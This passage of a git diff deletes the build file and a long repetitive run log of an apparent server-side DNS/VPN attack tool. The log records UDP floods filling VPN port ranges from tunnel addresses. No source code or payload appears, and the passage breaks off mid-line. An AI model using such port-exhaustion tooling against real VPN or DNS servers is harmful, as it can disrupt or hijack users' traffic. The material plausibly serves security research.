z-ZAiWu4FyQ{#3dC)PgVL|GuuF?D?|u?^*B?-|+|oYpV!l*TXXSH>N_Wx%j+x}J{e8QlK{zXtrfC%VSF`a)-W)|1`-@9?k=FL8|5 zKhsd5HDOk^^#=?7!}m`Z@Wc1{(vp3dI;U|>?&TcgxG(S$kNJ`G-z==qhqNzv^vr5s;x<42 z6&@f-eVwcFQvMlqzTW>bzVp`_g5vY)N#NxAISXF)A%F9?8VcLA8%f}#koIR&nT%id zwSULJzpxPQNC3_Ci>CdyRW9&7tDMG4Nv_mCX`3IIzwZ-bAbm+H>TC&TvYfZ3h#$RU l`ai&aTuQ_a`}oQDh5r$K?`r?~b38zLX85qqRsELyzX8<^#7O`E literal 0 HcmV?d00001 diff --git a/server-side-attack/dns-sside/phases/udder_fillup/Makefile b/server-side-attack/dns-sside/phases/udder_fillup/Makefile deleted file mode 100644 index 8737ce0..0000000 --- a/server-side-attack/dns-sside/phases/udder_fillup/Makefile +++ /dev/null @@ -1,2 +0,0 @@ -all: - g++ -O3 -o uud_send send.cpp -lpthread -ltins -std=c++11 diff --git a/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt b/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt deleted file mode 100644 index 9027f57..0000000 --- a/server-side-attack/dns-sside/phases/udder_fillup/fill_log.txt +++ /dev/null @@ -1,23545 +0,0 @@ -Using tun src ip: -Filling up vpn port range from 32010 to 32020.. -arc twas: 5sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port ) -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: -Filling up vpn port range from 32010 to 32020.. -arc twas: 5sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port ) -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.6 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 32010 to 32020.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 32010 to 32020 with udps.. -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Responding to all my own client probes to make sure they're kept in the table -arc twas: 7~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 1spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 